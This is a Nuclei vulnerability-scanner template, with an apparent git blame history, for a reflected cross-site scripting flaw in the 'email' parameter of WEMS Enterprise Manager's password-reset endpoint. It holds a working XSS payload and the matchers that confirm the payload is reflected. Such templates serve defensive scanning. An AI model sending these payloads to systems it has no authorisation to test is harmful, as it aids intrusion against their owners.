nuclei-templates/vulnerabilities/other/wems-manager-xss.yaml

id: wems-manager-xss

info:
  name: WEMS Enterprise Manager XSS
  author: pikpikcu
  severity: medium
  tags: xss
  description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
  reference:
    - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html

requests:
  - method: GET
    path:
      - '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '"><script>confirm(document.domain)</script>'
        part: body
      - type: word
        words:
          - "text/html"
        part: header
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00			`id: wems-manager-xss`

			`info:`
			`name: WEMS Enterprise Manager XSS`
			`author: pikpikcu`
			`severity: medium`
Adding tags to vulnerabilities and workflows 2021-02-12 05:53:01 +00:00			`tags: xss`
Add description 2021-10-25 09:59:08 +00:00			`description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Make references visible 2021-04-29 05:57:39 +00:00			`- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html`
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00
			`requests:`
			`- method: GET`
			`path:`
False positive on XSS templates Encode XSS payload to prevent false positives when the Query string is returned AS IS by the server. Recent browsers will always send the parameters encoded. 2020-09-03 15:56:31 +00:00			`- '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E'`
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- '"><script>confirm(document.domain)</script>'`
			`part: body`
Adding content type checks for XSS templates 2020-12-13 19:24:23 +00:00			`- type: word`
			`words:`
			`- "text/html"`
			`part: header`